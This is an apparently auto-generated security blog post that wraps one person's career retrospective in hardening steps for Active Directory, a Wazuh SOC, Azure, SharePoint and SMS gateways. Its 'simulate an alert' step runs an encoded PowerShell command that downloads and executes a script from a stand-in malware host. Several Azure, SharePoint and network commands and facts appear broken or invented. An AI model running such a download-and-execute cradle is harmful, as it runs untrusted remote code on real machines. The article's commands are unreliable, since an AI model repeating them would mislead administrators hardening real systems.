From Lotus Notes to Azure: 28 Years of Hard-Earned Security Lessons – And Why Your SOC Might Be Failing + Video

Listen to this Post

Featured Image

Introduction:

The journey from on-prem paper mills to cloud-native security operations is littered with forgotten protocols, misconfigured Active Directory domains, and SOC alerts that never get triaged. Jussi Metso, a Microsoft Dual Security MVP, recently shared a 28-year career retrospective that spans Lotus Notes training, EMC Documentum, Azure migration, and building Managed SOCs from scratch. His path reveals critical security gaps that persist today: legacy authentication, poor SharePoint upgrade hygiene, and the brutal reality that even experienced architects get cut during probation – but every failure teaches a hardened defensive technique.

Learning Objectives:

  • Identify legacy attack surfaces (Lotus Notes/Domino, on-prem SharePoint, WAP/SMS gateways) and migration risks.
  • Implement Azure security controls and SOC monitoring workflows to detect post-exploitation activity.
  • Harden Active Directory and on-prem infrastructure using commands and configuration baselines derived from real enterprise environments.

You Should Know:

  1. Extracting and Remediating Legacy Authentication in Active Directory
    Jussi’s early work at Tieto involved AD “juttuja” – but AD often harbors decades-old vulnerabilities. Attackers love legacy protocols (NTLMv1, LM hashes, unconstrained delegation). Before migrating to Azure, enumerate and disable them.

Step-by-step (Windows Domain Controller or management workstation with RSAT):
– Enumerate NTLM usage:

`Get-WinEvent -LogName “Microsoft-Windows-NTLM/Operational” | Where-Object {$_.Id -eq 8001}`

  • Find all computers with unconstrained delegation:
    `Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation | Select Name`
  • Disable LM and NTLMv1 via GPO:
    Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → Network security: LAN Manager authentication level → Send NTLMv2 response only. Refuse LM & NTLM.
  • Audit Kerberos service tickets:
    `klist` (local) or `Get-ADUser -Filter {ServicePrincipalName -ne “$null”} -Properties ServicePrincipalName`

These commands have saved multiple on-prem environments before cloud lift-and-shift – exactly the kind of “synti” (sin) Jussi refuses to revisit.

  1. Building a Managed SOC from Scratch (Even If You Get Fired Later)
    Jussi noted that at Premium Security, he learned “how to build a Managed SOC – good and bad.” A modern SOC requires log aggregation, detection engineering, and playbooks. Start with open-source tools if budget is tight.

Step-by-step (Linux Ubuntu 22.04 for SIEM prototype):

  • Install Wazuh manager (all-in-one SOC core):
    curl -s https://packages.wazuh.com/4.x/wazuh-install.sh | bash
    sudo systemctl status wazuh-manager
    
  • Forward Windows Event Logs from a test workstation:
    Install Wazuh agent on Windows, set `MANAGER_IP` to your Linux host, enable `ossec.conf` for Sysmon.
  • Create a custom detection rule for suspicious PowerShell:

Edit `/var/ossec/etc/rules/local_rules.xml`

<rule id="100001" level="10">
<if_sid>91500</if_sid>
<match>powershell.-enc</match>
<description>Base64-encoded PowerShell command</description>
</rule>

– Simulate an alert:

On Windows: `powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAdwBhAHIAZQAuAGMAbwBtAC8AZQB2AGkAbAAuAHAAcwAxACcAKQA=`

This gives you a functional SOC tier 1 alert within an hour – far faster than traditional enterprise rollouts.

  1. Azure Migration Hardening: Lessons from Fujitsu’s On-Prem to Cloud Shift
    Jussi spent 18 years at Fujitsu, ending with “pilviurani Azuren merkeissä.” A common failure is treating Azure like a virtual data center. Use Azure-native security controls immediately.

Step-by-step (Azure CLI and Portal):

  • Enable Microsoft Defender for Cloud (free tier at minimum):

`az security pricing create -n VirtualMachines –tier “Standard”`

  • Deploy Azure Policy to block public RDP/SSH:

`az policy assignment create –name “no-public-rdp” –policy “b0f33259-77bc-4b2b-91fb-f1c3d4c5b3a8″`

  • Enable just-in-time (JIT) VM access:
    `az vm update –resource-group myRg –name myVm –enable-auto-update –just-in-time-access`
  • Audit storage account public access:

`az storage account list –query “[?allowBlobPublicAccess == true]”`

Jussi mentioned “suurten asiakkaiden toimintojen pyörittämisestä” – those large customers often fail these simple checks. Automate them via Azure DevOps pipelines.

4. SharePoint Security: Avoiding the On-Prem Upgrade Trap

At Sulava, Jussi noted that on-prem SharePoint couldn’t be updated to new versions, let alone cloud. Out-of-support SharePoint is a goldmine for attackers (CVE-2023-29357, CVE-2024-21427). If you must keep on-prem, apply strict hardening.

Step-by-step (Windows Server with SharePoint):

  • Check SharePoint build version:

Open SharePoint Management Shell: `(Get-SPFarm).BuildVersion`

  • Disable anonymous access to all web apps:

`Get-SPWebApplication | Set-SPWebApplication -AllowAnonymousAccess $false`

  • Restrict legacy authentication protocols (e.g., SOAP, WebDAV):
    Use IIS URL Rewrite to block `/_vti_bin/` and `/_layouts/` for unauthenticated requests.
  • Migrate to SharePoint Online if possible:
    Use SharePoint Migration Tool (SPMT) – but first, run `Invoke-SPOMigrationEncryption` to encrypt content.

Jussi’s comment “Sulavalla vaan ei ollut liikaa ollut tietoturvahommia” (Sulava didn’t have much security work) is a reminder: even modern collaboration shops neglect security hygiene.

  1. SOC Log Analysis: Detecting WAP, MMS, and SMS Gateway Abuse
    Early in his career, Jussi built web stores for SMS, MMS, and WAP messages. These gateways are now legacy, but many telecom and IoT environments still run them. Attackers abuse them for SMS toll fraud, credential harvesting via WAP push, and MMS malware.

Step-by-step (Splunk/ELK query example for detecting MMS gateway abuse):
– Search for large outbound MMS traffic from internal IPs:
`index=telecom_gateway (proto=MMS OR proto=WAP) bytes_out>500000 source_ip=10.x.x.x | stats sum(bytes_out) by src_ip, dest_phone`
– Linux tcpdump to capture WAP traffic on port 9200 (WAP Push):
`sudo tcpdump -i eth0 -nn -s0 port 9200 -w wap_capture.pcap`
– Analyze with Wireshark filter: `wap.push`
– Block rogue SMS home routing in the SMSC using regex:
Example regex to detect international premium rate abuse: ^(881|882|883|885|886|887|888|889).

Jussi’s era of “banaanipuhelin” (Nokia banana phone) may be history, but the underlying SS7 and SMPP vulnerabilities remain unpatched in many operators.

What Undercode Say:

  • Key Takeaway 1 – Every failed probation is a free security audit. Jussi was let go from CGI and Premium Security during probation, yet each time he extracted new SOC build techniques and startup risk patterns. In cybersecurity, “getting mono” (fired) often reveals where real operational gaps exist – because those gaps get you fired.
  • Key Takeaway 2 – Legacy knowledge is a zero-day shield. Understanding WAP, Lotus Notes, and EMC Documentum isn’t nostalgia; it’s threat intelligence. Attackers rely on forgotten protocols to bypass modern EDR. Jussi’s 28 years mean he can hunt threats that Gen Z analysts can’t even name.
    Analysis: The post underscores a brutal truth: longevity doesn’t protect you from corporate whims (two probation cuts in a row), but it does build an irreplaceable map of enterprise failure modes. The pivot to entrepreneurship at 50 is the ultimate risk management – you can’t be fired from your own SOC.

Prediction:

As AI-generated attacks automate exploitation of legacy enterprise protocols (think: auto-crafted WAP push exploits or Lotus Notes memory corruption), the demand for graybeard security architects will surge. Over the next 5 years, “vintage infrastructure security” will become a formal niche, with annual salaries rivaling AI engineers. Companies that fire their 28-year veterans will pay 10x for incident response when a forgotten EMC Documentum repository becomes the breach vector. Jussi’s new firm – built on “kaikkiin vanhoihin synteihin en ole kyllä palaamassa” (not returning to old sins) – will profit from cleaning up precisely those sins for panicking enterprises.

▶️ Related Video (70% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Metso T%C3%A4ytin – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky